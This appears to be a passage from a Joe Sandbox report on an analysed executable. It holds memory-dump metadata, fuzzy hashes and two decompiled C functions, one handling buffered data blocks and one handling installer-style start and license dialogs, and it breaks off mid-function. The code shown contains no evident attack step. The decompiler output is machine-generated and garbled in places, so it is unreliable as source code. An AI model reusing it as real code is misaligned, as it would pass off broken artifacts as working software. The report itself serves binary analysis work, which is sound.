                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: d6b6e7f875f4cfbfa595505cf728241b89dd0c3d0eb9f0bfce9e6936dc5ab238
                • Instruction ID: 5d1069e19836aa7d415896e5dad74379184a1731a19ae23787e69aecb9de3c00
                • Opcode Fuzzy Hash: d6b6e7f875f4cfbfa595505cf728241b89dd0c3d0eb9f0bfce9e6936dc5ab238
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E6CDC Relevance: .3, Instructions: 343COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 88%
                			E003E6CDC(signed int __ecx, void* __edx) {
				void* __ebp;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t176;
				signed int _t179;
				intOrPtr _t182;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t206;
				void* _t217;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				signed int _t230;
				signed int _t232;
				intOrPtr _t235;
				intOrPtr* _t236;
				intOrPtr* _t242;
				intOrPtr* _t244;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t257;
				signed int _t265;
				intOrPtr* _t269;
				intOrPtr _t272;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t280;
				intOrPtr* _t282;
				void* _t283;
				signed int _t284;
				intOrPtr* _t285;
				intOrPtr _t287;
				void* _t289;
				void* _t290;
				void* _t292;

				_t223 = __ecx; // executed
				E003E359E(__ecx, __edx); // executed
				E003E4D0A(__ecx,  *((intOrPtr*)(_t290 + 0x244)));
				_t282 = _t223 + 0x18;
				_t249 = 0;
				 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				if( *(_t223 + 0x1c) +  *(_t223 + 0x1c) == 0) {
					 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				} else {
					_t247 = 0;
					do {
						_t220 =  *_t282;
						_t247 = _t247 + 0x4ae4;
						_t249 = _t249 + 1;
						 *((char*)(_t220 + _t247 - 0x13)) = 0;
						 *((char*)(_t220 + _t247 - 0x11)) = 0;
					} while (_t249 <  *(_t223 + 0x1c) +  *(_t223 + 0x1c));
				}
				_t226 = 5;
				memcpy( *_t282 + 0x18, _t223 + 0x8c, _t226 << 2);
				E003F0320( *_t282 + 0x30, _t223 + 0xa0, 0x4a9c);
				_t292 = _t290 + 0x18;
				 *(_t292 + 0x30) = 0;
				_t265 = 0;
				 *((char*)(_t292 + 0x1b)) = 0;
				 *((char*)(_t292 + 0x13)) = 0;
				while(1) {
					L6:
					_t272 = 0;
					 *((intOrPtr*)(_t292 + 0x1c)) = 0;
					while(1) {
						L7:
						_push(0x00400000 - _t265 & 0xfffffff0);
						_push( *((intOrPtr*)(_t223 + 0x20)) + _t265);
						_t166 = E003DD114( *_t223);
						 *((intOrPtr*)(_t292 + 0x34)) = _t166;
						if(_t166 < 0) {
							break;
						}
						_t265 = _t265 + _t166;
						 *(_t292 + 0x2c) = _t265;
						if(_t265 != 0) {
							if(_t166 <= 0 || _t265 >= 0x400) {
								if(_t272 >= _t265) {
									goto L69;
								} else {
									while(1) {
										_t252 = 0;
										 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
										 *(_t292 + 0x24) = 0;
										_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
										if(_t176 != 0) {
										}
										L13:
										_t235 = 0;
										 *((intOrPtr*)(_t292 + 0x20)) = 0;
										while(1) {
											_t280 =  *_t282 + _t235;
											 *(_t292 + 0x30) = _t252;
											_t29 = _t280 + 4; // 0x4
											_t236 = _t29;
											 *_t280 = _t223;
											if( *((char*)(_t280 + 0x4ad3)) == 0) {
												goto L16;
											}
											L15:
											 *(_t280 + 0x4acc) = _t265;
											L18:
											_t42 = _t280 + 0x18; // 0x18
											_t285 = _t42;
											 *((char*)(_t280 + 0x4ad3)) = 0;
											 *(_t280 + 0x4ae0) = _t252;
											 *((char*)(_t280 + 0x4ad2)) = _t176 & 0xffffff00 |  *((intOrPtr*)(_t292 + 0x34)) == 0x00000000;
											if( *((char*)(_t280 + 0x14)) != 0) {
												L23:
												if( *((char*)(_t292 + 0x1b)) != 0 ||  *_t285 > 0x20000) {
													 *((char*)(_t280 + 0x4ad1)) = 1;
													 *((char*)(_t292 + 0x1b)) = 1;
												} else {
													 *(_t292 + 0x28) =  *(_t292 + 0x28) + 1;
												}
												_t287 =  *((intOrPtr*)(_t292 + 0x1c)) +  *((intOrPtr*)(_t280 + 0x24)) +  *_t285;
												_t252 = _t252 + 1;
												 *((intOrPtr*)(_t292 + 0x1c)) = _t287;
												_t235 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
												 *(_t292 + 0x24) = _t252;
												 *((intOrPtr*)(_t292 + 0x20)) = _t235;
												_t217 = _t265 - _t287;
												if(_t217 < 0 ||  *((char*)(_t280 + 0x28)) == 0) {
													if(_t217 >= 0x400) {
														_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
														if(_t252 < _t176) {
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t280 =  *_t282 + _t235;
															 *(_t292 + 0x30) = _t252;
															_t29 = _t280 + 4; // 0x4
															_t236 = _t29;
															 *_t280 = _t223;
															if( *((char*)(_t280 + 0x4ad3)) == 0) {
																goto L16;
															}
														}
													}
												}
											} else {
												_push(_t285);
												_push(_t236);
												 *((char*)(_t280 + 0x14)) = 1;
												if(E003E3E0B(_t223) == 0 ||  *((char*)(_t280 + 0x29)) == 0 &&  *((char*)(_t223 + 0xe662)) == 0) {
													 *((char*)(_t292 + 0x13)) = 1;
												} else {
													_t252 =  *(_t292 + 0x24);
													 *((char*)(_t223 + 0xe662)) = 1;
													goto L23;
												}
											}
											break;
											L16:
											E003DA85A(_t236,  *((intOrPtr*)(_t223 + 0x20)) +  *((intOrPtr*)(_t292 + 0x1c)));
											_t33 = _t280 + 4; // 0x4
											_t236 = _t33;
											 *((intOrPtr*)(_t236 + 4)) = 0;
											_t176 = _t265 -  *((intOrPtr*)(_t292 + 0x1c));
											__eflags = _t176;
											 *_t236 = 0;
											 *(_t280 + 0x4acc) = _t176;
											if(_t176 != 0) {
												 *((char*)(_t280 + 0x4ad0)) = 0;
												 *((char*)(_t280 + 0x14)) = 0;
												 *((char*)(_t280 + 0x2c)) = 0;
												_t252 =  *(_t292 + 0x24);
												goto L18;
											}
											break;
										}
										L33:
										_t232 =  *(_t292 + 0x28);
										_t275 = _t232 /  *(_t223 + 0x1c);
										_t179 = _t232;
										__eflags = _t179 %  *(_t223 + 0x1c);
										if(_t179 %  *(_t223 + 0x1c) != 0) {
											_t275 = _t275 + 1;
											__eflags = _t275;
										}
										_t283 = 0;
										__eflags = _t232;
										if(_t232 != 0) {
											_t269 =  *((intOrPtr*)(_t292 + 0x14));
											_t257 = 0;
											_t202 = _t275 * 0x4ae4;
											__eflags = _t202;
											 *((intOrPtr*)(_t292 + 0x20)) = 0;
											 *(_t292 + 0x38) = _t202;
											_t203 = _t292 + 0x40;
											do {
												_t258 = _t257 +  *_t269;
												_t244 = _t203;
												 *((intOrPtr*)(_t292 + 0x3c)) = _t203 + 8;
												_t206 =  *(_t292 + 0x28) - _t283;
												 *_t244 = _t257 +  *_t269;
												__eflags = _t275 - _t206;
												if(_t275 < _t206) {
													_t206 = _t275;
												}
												__eflags =  *(_t292 + 0x24) - 1;
												 *(_t244 + 4) = _t206;
												if( *(_t292 + 0x24) != 1) {
													E003E0F86( *((intOrPtr*)(_t223 + 0x14)), E003E77C0, _t244);
												} else {
													E003E7153(_t223, _t258);
												}
												_t283 = _t283 + _t275;
												_t257 =  *((intOrPtr*)(_t292 + 0x20)) +  *(_t292 + 0x38);
												_t203 =  *((intOrPtr*)(_t292 + 0x3c));
												 *((intOrPtr*)(_t292 + 0x20)) = _t257;
												__eflags = _t283 -  *(_t292 + 0x28);
											} while (_t283 <  *(_t292 + 0x28));
											_t265 =  *(_t292 + 0x2c);
										}
										_t284 =  *(_t292 + 0x24);
										__eflags = _t284;
										if(_t284 == 0) {
											_t272 =  *((intOrPtr*)(_t292 + 0x1c));
											goto L68;
										} else {
											E003E11CF( *((intOrPtr*)(_t223 + 0x14)));
											_t276 = 0;
											__eflags = _t284;
											if(_t284 == 0) {
												L55:
												__eflags =  *((char*)(_t292 + 0x13));
												if( *((char*)(_t292 + 0x13)) == 0) {
													_t182 =  *((intOrPtr*)(_t292 + 0x1c));
													_t278 = _t265 - _t182;
													__eflags = _t278 - 0x400;
													if(_t278 < 0x400) {
														__eflags = _t278;
														if(__eflags >= 0) {
															if(__eflags > 0) {
																__eflags = _t182 +  *((intOrPtr*)(_t223 + 0x20));
																E003F0320( *((intOrPtr*)(_t223 + 0x20)), _t182 +  *((intOrPtr*)(_t223 + 0x20)), _t278);
																_t292 = _t292 + 0xc;
															}
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t265 = _t278;
															goto L6;
														}
													} else {
														_t282 =  *((intOrPtr*)(_t292 + 0x14));
														_t272 = _t182;
														__eflags = _t272 - _t265;
														if(_t272 >= _t265) {
															goto L7;
														} else {
															_t252 = 0;
															 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
															 *(_t292 + 0x24) = 0;
															_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
															if(_t176 != 0) {
															}
															goto L33;
														}
													}
												}
											} else {
												_t185 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t292 + 0x20)) = 0;
												do {
													_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14)))) + _t185;
													__eflags =  *((char*)(_t289 + 0x4ad1));
													if( *((char*)(_t289 + 0x4ad1)) != 0) {
														L50:
														_t186 = E003E77EF(_t223, _t289);
														__eflags = _t186;
														if(_t186 != 0) {
															goto L51;
														}
													} else {
														_t201 = E003E390D(_t223, _t289);
														__eflags = _t201;
														if(_t201 != 0) {
															__eflags =  *((char*)(_t289 + 0x4ad1));
															if( *((char*)(_t289 + 0x4ad1)) == 0) {
																L51:
																__eflags =  *((char*)(_t289 + 0x4ad0));
																if( *((char*)(_t289 + 0x4ad0)) == 0) {
																	__eflags =  *((char*)(_t289 + 0x4ad3));
																	if( *((char*)(_t289 + 0x4ad3)) != 0) {
																		_t241 =  *((intOrPtr*)(_t223 + 0x20));
																		_t189 =  *((intOrPtr*)(_t289 + 0x10)) -  *((intOrPtr*)(_t223 + 0x20)) +  *(_t289 + 4);
																		__eflags = _t265 - _t189;
																		if(_t265 > _t189) {
																			_t265 = _t265 - _t189;
																			 *(_t292 + 0x38) = _t265;
																			E003F0320(_t241, _t189 + _t241, _t265);
																			_t292 = _t292 + 0xc;
																			 *((intOrPtr*)(_t289 + 0x18)) =  *((intOrPtr*)(_t289 + 0x18)) +  *(_t289 + 0x20) -  *(_t289 + 4);
																			 *(_t289 + 0x24) =  *(_t289 + 0x24) & 0x00000000;
																			 *(_t289 + 0x20) =  *(_t289 + 0x20) & 0x00000000;
																			 *(_t289 + 4) =  *(_t289 + 4) & 0x00000000;
																			 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t223 + 0x20));
																			__eflags = _t276;
																			if(_t276 != 0) {
																				_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
																				E003F0320(_t196, _t289, 0x4ae4);
																				_t242 =  *((intOrPtr*)(_t292 + 0x20));
																				_t292 = _t292 + 0xc;
																				 *((intOrPtr*)( *_t242 + 0x4ad4)) =  *((intOrPtr*)(_t196 + 0x4ad4));
																				 *((intOrPtr*)( *_t242 + 0x4adc)) =  *((intOrPtr*)(_t196 + 0x4adc));
																				_t265 =  *(_t292 + 0x2c);
																				 *((char*)(_t289 + 0x4ad3)) = 0;
																			}
																			_t272 = 0;
																			 *((intOrPtr*)(_t292 + 0x1c)) = 0;
																			L68:
																			_t282 =  *((intOrPtr*)(_t292 + 0x14));
																			goto L69;
																		}
																	} else {
																		__eflags =  *((char*)(_t289 + 0x28));
																		if( *((char*)(_t289 + 0x28)) == 0) {
																			goto L54;
																		}
																	}
																}
															} else {
																goto L50;
															}
														}
													}
													goto L70;
													L54:
													_t276 = _t276 + 1;
													_t185 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
													 *((intOrPtr*)(_t292 + 0x20)) = _t185;
													__eflags = _t276 -  *(_t292 + 0x24);
												} while (_t276 <  *(_t292 + 0x24));
												goto L55;
											}
										}
										goto L70;
									}
								}
							} else {
								L69:
								__eflags =  *((char*)(_t292 + 0x13));
								if( *((char*)(_t292 + 0x13)) == 0) {
									continue;
								}
							}
						}
						break;
					}
					L70:
					 *(_t223 + 0x7c) =  *(_t223 + 0x7c) &  *(_t223 + 0xe6dc);
					E003E5202(_t223);
					_t250 =  *(_t292 + 0x30) * 0x4ae4;
					_t230 = 5;
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
					__eflags = _t170 + _t250 + 0x30;
					return E003F0320(memcpy(_t223 + 0x8c, _t250 + 0x18 + _t170, _t230 << 2), _t170 + _t250 + 0x30, 0x4a9c);
				}
			}















































                0x003e6ce6
                0x003e6ce8
                0x003e6cf6
                0x003e6cfe
                0x003e6d01
                0x003e6d03
                0x003e6d09
                0x003e6d2c
                0x003e6d0b
                0x003e6d0b
                0x003e6d0d
                0x003e6d0d
                0x003e6d10
                0x003e6d16
                0x003e6d17
                0x003e6d1c
                0x003e6d26
                0x003e6d2a
                0x003e6d3b
                0x003e6d4b
                0x003e6d54
                0x003e6d5b
                0x003e6d5e
                0x003e6d62
                0x003e6d64
                0x003e6d68
                0x003e6d6c
                0x003e6d6c
                0x003e6d6c
                0x003e6d6e
                0x003e6d72
                0x003e6d72
                0x003e6d7e
                0x003e6d84
                0x003e6d85
                0x003e6d8a
                0x003e6d90
                0x00000000
                0x00000000
                0x003e6d96
                0x003e6d98
                0x003e6d9c
                0x003e6da4
                0x003e6db4
                0x00000000
                0x00000000
                0x003e6dba
                0x003e6dbd
                0x003e6dbf
                0x003e6dc3
                0x003e6dc7
                0x003e6dc9
                0x003e6dc9
                0x003e6dcf
                0x003e6dcf
                0x003e6dd1
                0x003e6dd5
                0x003e6dd8
                0x003e6dda
                0x003e6de5
                0x003e6de5
                0x003e6de8
                0x003e6dea
                0x00000000
                0x00000000
                0x003e6dec
                0x003e6dec
                0x003e6e2d
                0x003e6e32
                0x003e6e32
                0x003e6e35
                0x003e6e3f
                0x003e6e49
                0x003e6e4f
                0x003e6e80
                0x003e6e85
                0x003e6e96
                0x003e6e9d
                0x003e6e90
                0x003e6e90
                0x003e6e90
                0x003e6eb0
                0x003e6eb2
                0x003e6eb3
                0x003e6eb7
                0x003e6ebd
                0x003e6ec3
                0x003e6ec7
                0x003e6ec9
                0x003e6ed6
                0x003e6edb
                0x003e6edf
                0x003e6ee1
                0x003e6dd8
                0x003e6dda
                0x003e6de5
                0x003e6de5
                0x003e6de8
                0x003e6dea
                0x00000000
                0x00000000
                0x003e6dea
                0x003e6edf
                0x003e6ed6
                0x003e6e51
                0x003e6e51
                0x003e6e52
                0x003e6e55
                0x003e6e60
                0x003e6eea
                0x003e6e75
                0x003e6e75
                0x003e6e79
                0x00000000
                0x003e6e79
                0x003e6e60
                0x00000000
                0x003e6df4
                0x003e6dfc
                0x003e6e03
                0x003e6e03
                0x003e6e08
                0x003e6e0b
                0x003e6e0b
                0x003e6e0f
                0x003e6e11
                0x003e6e17
                0x003e6e1d
                0x003e6e23
                0x003e6e26
                0x003e6e29
                0x00000000
                0x003e6e29
                0x00000000
                0x003e6e17
                0x003e6eef
                0x003e6eef
                0x003e6efc
                0x003e6efe
                0x003e6f03
                0x003e6f05
                0x003e6f07
                0x003e6f07
                0x003e6f07
                0x003e6f08
                0x003e6f0a
                0x003e6f0c
                0x003e6f0e
                0x003e6f12
                0x003e6f14
                0x003e6f14
                0x003e6f1a
                0x003e6f1e
                0x003e6f22
                0x003e6f26
                0x003e6f26
                0x003e6f28
                0x003e6f2d
                0x003e6f35
                0x003e6f37
                0x003e6f39
                0x003e6f3b
                0x003e6f3d
                0x003e6f3d
                0x003e6f3f
                0x003e6f44
                0x003e6f47
                0x003e6f5c
                0x003e6f49
                0x003e6f4c
                0x003e6f4c
                0x003e6f65
                0x003e6f67
                0x003e6f6b
                0x003e6f6f
                0x003e6f73
                0x003e6f73
                0x003e6f79
                0x003e6f79
                0x003e6f7d
                0x003e6f81
                0x003e6f83
                0x003e70eb
                0x00000000
                0x003e6f89
                0x003e6f8c
                0x003e6f91
                0x003e6f93
                0x003e6f95
                0x003e700b
                0x003e700b
                0x003e7010
                0x003e7016
                0x003e701c
                0x003e701e
                0x003e7024
                0x003e70ca
                0x003e70cc
                0x003e70ce
                0x003e70d3
                0x003e70d8
                0x003e70dd
                0x003e70dd
                0x003e70e0
                0x003e70e4
                0x00000000
                0x003e70e4
                0x003e702a
                0x003e702a
                0x003e702e
                0x003e7030
                0x003e7032
                0x00000000
                0x003e7038
                0x003e6dbd
                0x003e6dbf
                0x003e6dc3
                0x003e6dc7
                0x003e6dc9
                0x003e6dc9
                0x00000000
                0x003e6dc9
                0x003e7032
                0x003e7024
                0x003e6f97
                0x003e6f97
                0x003e6f97
                0x003e6f99
                0x003e6f9d
                0x003e6fa3
                0x003e6fa5
                0x003e6fac
                0x003e6fc7
                0x003e6fca
                0x003e6fcf
                0x003e6fd1
                0x00000000
                0x00000000
                0x003e6fae
                0x003e6fb1
                0x003e6fb6
                0x003e6fb8
                0x003e6fbe
                0x003e6fc5
                0x003e6fd7
                0x003e6fd7
                0x003e6fde
                0x003e6fe4
                0x003e6feb
                0x003e7040
                0x003e7045
                0x003e7048
                0x003e704a
                0x003e7050
                0x003e7057
                0x003e705b
                0x003e7063
                0x003e7069
                0x003e706c
                0x003e7070
                0x003e7077
                0x003e707b
                0x003e707e
                0x003e7080
                0x003e708c
                0x003e709b
                0x003e70a0
                0x003e70a4
                0x003e70a9
                0x003e70b1
                0x003e70b7
                0x003e70bb
                0x003e70bb
                0x003e70c2
                0x003e70c4
                0x003e70ef
                0x003e70ef
                0x00000000
                0x003e70ef
                0x003e6fed
                0x003e6fed
                0x003e6ff1
                0x00000000
                0x00000000
                0x003e6ff1
                0x003e6feb
                0x00000000
                0x00000000
                0x00000000
                0x003e6fc5
                0x003e6fb8
                0x00000000
                0x003e6ff7
                0x003e6ffb
                0x003e6ffc
                0x003e7001
                0x003e7005
                0x003e7005
                0x00000000
                0x003e6f9d
                0x003e6f95
                0x00000000
                0x003e6f83
                0x003e6dba
                0x003e70f3
                0x003e70f3
                0x003e70f3
                0x003e70f8
                0x00000000
                0x00000000
                0x003e70f8
                0x003e6da4
                0x00000000
                0x003e6d9c
                0x003e70fe
                0x003e7106
                0x003e7109
                0x003e710e
                0x003e7122
                0x003e7128
                0x003e7132
                0x003e7150
                0x003e7150

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 1d78dbc51c1eae3163f97ac1e6e6689188ffa0bb7ea4053aaf2fbeb316412751
                • Instruction ID: 7ab978624c1b5c712e01b12452462042ef3b6b9befacf427b38c896a69eec6b1
                • Opcode Fuzzy Hash: 1d78dbc51c1eae3163f97ac1e6e6689188ffa0bb7ea4053aaf2fbeb316412751
                • Instruction Fuzzy Hash: F6D116716083908FCB15CF29C84179BBBE1BF99308F09466DE8899B382D774ED05CB56
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB7E0 Relevance: 107.5, APIs: 48, Strings: 13, Instructions: 731windowfilesleepCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E003EB7E0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* _t105;
				int _t106;
				long _t108;
				long _t109;
				struct HWND__* _t110;
				struct HWND__* _t114;
				void* _t117;
				void* _t118;
				void* _t135;
				void* _t139;
				signed int _t152;
				struct HWND__* _t155;
				void* _t173;
				int _t186;
				signed int _t201;
				void* _t202;
				long _t210;
				void* _t220;
				void* _t234;
				signed int _t244;
				void* _t245;
				void* _t260;
				long _t262;
				long _t263;
				long _t264;
				int _t278;
				int _t280;
				void* _t285;
				void* _t289;
				int _t293;
				void* _t296;
				WCHAR* _t298;
				intOrPtr _t299;
				intOrPtr _t300;
				struct HWND__* _t311;
				intOrPtr _t314;
				void* _t316;
				struct HWND__* _t317;
				void* _t318;
				struct HWND__* _t320;
				long _t321;
				struct HWND__* _t322;
				intOrPtr _t323;
				void* _t325;
				void* _t327;
				void* _t328;
				void* _t330;

				_t309 = __edx;
				_t296 = __ecx;
				E003EEB78(0x402b04, _t328);
				E003EEC50(0xfe80);
				_t314 =  *((intOrPtr*)(_t328 + 0xc));
				_t311 =  *(_t328 + 8);
				_t105 = E003D1316(__edx, _t311, _t314,  *(_t328 + 0x10),  *((intOrPtr*)(_t328 + 0x14)), L"STARTDLG", 0, 0);
				_t293 = 1;
				if(_t105 != 0) {
					L128:
					_t106 = _t293;
					L129:
					 *[fs:0x0] =  *((intOrPtr*)(_t328 - 0xc));
					return _t106;
				}
				_t316 = _t314 - 0x110;
				if(_t316 == 0) {
					_push(_t311);
					E003ED69E(_t296, __edx, __eflags, __fp0);
					_t108 =  *0x427b7c;
					 *0x418450 = _t311;
					 *0x418458 = _t311;
					__eflags = _t108;
					if(_t108 != 0) {
						SendMessageW(_t311, 0x80, 1, _t108); // executed
					}
					_t109 =  *0x42ec84;
					__eflags = _t109;
					if(_t109 != 0) {
						SendDlgItemMessageW(_t311, 0x6c, 0x172, 0, _t109); // executed
					}
					_t110 = GetDlgItem(_t311, 0x68);
					 *(_t328 - 0x14) = _t110;
					SendMessageW(_t110, 0x435, 0, 0x400000);
					E003EA64D(_t328 - 0x3474, 0x800);
					_t114 = GetDlgItem(_t311, 0x66);
					__eflags =  *0x41a472;
					_t317 = _t114;
					 *(_t328 - 0x18) = _t317;
					_t298 = 0x41a472;
					if( *0x41a472 == 0) {
						_t298 = _t328 - 0x3474;
					}
					SetWindowTextW(_t317, _t298);
					E003EABAB(_t317); // executed
					_push(0x42fca0);
					_push(0x42fc90);
					_push(0x42ec90);
					_push(_t311);
					 *0x418463 = 0; // executed
					_t117 = E003EB093(_t298, _t309, __eflags); // executed
					__eflags = _t117;
					if(_t117 == 0) {
						 *0x418456 = _t293;
					}
					__eflags =  *0x42fca0;
					if( *0x42fca0 > 0) {
						_push(7);
						_push( *0x42fc90);
						_push(_t311);
						E003EC73F(_t309, _t311);
					}
					__eflags =  *0x41c577;
					if( *0x41c577 == 0) {
						SetDlgItemTextW(_t311, 0x6b, E003DE617(0xbf));
						SetDlgItemTextW(_t311, _t293, E003DE617(0xbe));
					}
					__eflags =  *0x42fca0;
					if( *0x42fca0 <= 0) {
						L104:
						__eflags =  *0x418463;
						if( *0x418463 != 0) {
							L116:
							__eflags =  *0x41a46c - 2;
							if( *0x41a46c == 2) {
								EnableWindow(_t317, 0);
							}
							__eflags =  *0x419468;
							if( *0x419468 != 0) {
								E003D12D3(_t311, 0x67, 0);
								E003D12D3(_t311, 0x66, 0);
							}
							_t118 =  *0x41a46c;
							__eflags = _t118;
							if(_t118 != 0) {
								__eflags =  *0x418454;
								if( *0x418454 == 0) {
									_push(0);
									_push(_t293);
									_push(0x111);
									_push(_t311);
									__eflags = _t118 - _t293;
									if(_t118 != _t293) {
										 *0x4330a0();
									} else {
										SendMessageW(); // executed
									}
								}
							}
							__eflags =  *0x418456;
							if( *0x418456 != 0) {
								_push(E003DE617(0x90));
								_push(_t293);
								L127:
								SetDlgItemTextW(_t311, ??, ??);
							}
							goto L128;
						}
						__eflags =  *0x42fc94;
						if( *0x42fc94 != 0) {
							goto L116;
						}
						__eflags =  *0x41a46c;
						if( *0x41a46c != 0) {
							goto L116;
						}
						__eflags = 0;
						_t318 = 0xaa;
						 *((short*)(_t328 - 0x7874)) = 0;
						goto L108;
						do {
							while(1) {
								L108:
								__eflags = _t318 - 0xaa;
								if(_t318 != 0xaa) {
									goto L110;
								}
								__eflags =  *0x41c577;
								if( *0x41c577 == 0) {
									break;
								}
								L110:
								__eflags = _t318 - 0xab;
								if(__eflags != 0) {
									L113:
									E003E05DA(__eflags, _t328 - 0x7874, " ", 0x2000);
									E003E05DA(__eflags, _t328 - 0x7874, E003DE617(_t318), 0x2000);
									break;
								}
								__eflags =  *0x41c577;
								if(__eflags == 0) {
									goto L113;
								}
								_t318 = _t318 + 1;
							}
							_t318 = _t318 + 1;
							__eflags = _t318 - 0xb0;
						} while (__eflags <= 0);
						_t299 =  *0x418440; // 0x0
						E003E9ED5(_t299, __eflags,  *0x41102c,  *(_t328 - 0x14), _t328 - 0x7874, 0, 0);
						_t317 =  *(_t328 - 0x18);
						goto L116;
					} else {
						_push(0);
						_push( *0x42fc90);
						_push(_t311); // executed
						E003EC73F(_t309, _t311); // executed
						_t135 =  *0x42fc94;
						__eflags = _t135;
						if(_t135 != 0) {
							__eflags =  *0x41a46c;
							if(__eflags == 0) {
								_t300 =  *0x418440; // 0x0
								E003E9ED5(_t300, __eflags,  *0x41102c,  *(_t328 - 0x14), _t135, 0, 0);
								L003F3E2E( *0x42fc94);
							}
						}
						__eflags =  *0x41a46c - _t293;
						if( *0x41a46c == _t293) {
							L103:
							_push(_t293);
							_push( *0x42fc90);
							_push(_t311);
							E003EC73F(_t309, _t311);
							goto L104;
						} else {
							 *0x4330c0(_t311);
							__eflags =  *0x41a46c - _t293;
							if( *0x41a46c == _t293) {
								goto L103;
							}
							__eflags =  *0x41a471;
							if( *0x41a471 != 0) {
								goto L103;
							}
							_push(3);
							_push( *0x42fc90);
							_push(_t311);
							E003EC73F(_t309, _t311);
							__eflags =  *0x42fc98;
							if( *0x42fc98 == 0) {
								goto L103;
							}
							_t139 = DialogBoxParamW( *0x41102c, L"LICENSEDLG", 0, E003EB5C0, 0);
							__eflags = _t139;
							if(_t139 == 0) {
								L23:
								 *0x418454 = _t293;
								L24:
								_push(_t293);
								L25:
								EndDialog(_t311, ??); // executed
								goto L128;
							}
							goto L103;
						}
					}
				}
				if(_t316 != 1) {
					L6:
					_t106 = 0;
					goto L129;
				}
				_t152 = ( *(_t328 + 0x10) & 0x0000ffff) - 1;
				if(_t152 == 0) {
					__eflags =  *0x418455;
					if( *0x418455 != 0) {
						L21:
						GetDlgItemTextW(_t311, 0x66, _t328 - 0x2474, 0x800);
						__eflags =  *0x418455;
						if( *0x418455 == 0) {
							__eflags =  *0x418456;
							if( *0x418456 == 0) {
								_t155 = GetDlgItem(_t311, 0x68);
								__eflags =  *0x41845c;
								_t320 = _t155;
								if( *0x41845c == 0) {
									SendMessageW(_t320, 0xb1, 0, 0xffffffff);
									SendMessageW(_t320, 0xc2, 0, 0x4035f4);
								}
								SetFocus(_t320);
								__eflags =  *0x419468;
								if( *0x419468 == 0) {
									_t321 = 0x800;
									E003E0602(_t328 - 0x1474, _t328 - 0x2474, 0x800);
									E003ED453(_t296, _t328 - 0x1474, 0x800);
									E003D4092(_t328 - 0x4974, 0x880, E003DE617(0xb9), _t328 - 0x1474);
									_t330 = _t330 + 0x10;
									_push(_t328 - 0x4974);
									_push(0);
									E003ED4D4();
								} else {
									_push(E003DE617(0xba));
									_push(0);
									E003ED4D4();
									_t321 = 0x800;
								}
								__eflags =  *0x41a471;
								if( *0x41a471 == 0) {
									E003EDB4B(_t328 - 0x2474);
								}
								 *(_t328 - 0xd) = 0;
								E003DA0B1(_t293, _t296, _t311, _t328, _t328 - 0x2474, 0, 0);
								__eflags = 0;
								if(0 != 0) {
									L39:
									_t302 = E003EAC04(_t328 - 0x2474);
									 *((char*)(_t328 - 0xe)) = _t302;
									__eflags = _t302;
									if(_t302 == 0) {
										_t263 = GetLastError();
										_t302 =  *((intOrPtr*)(_t328 - 0xe));
										__eflags = _t263 - 5;
										if(_t263 == 5) {
											 *(_t328 - 0xd) = _t293;
										}
									}
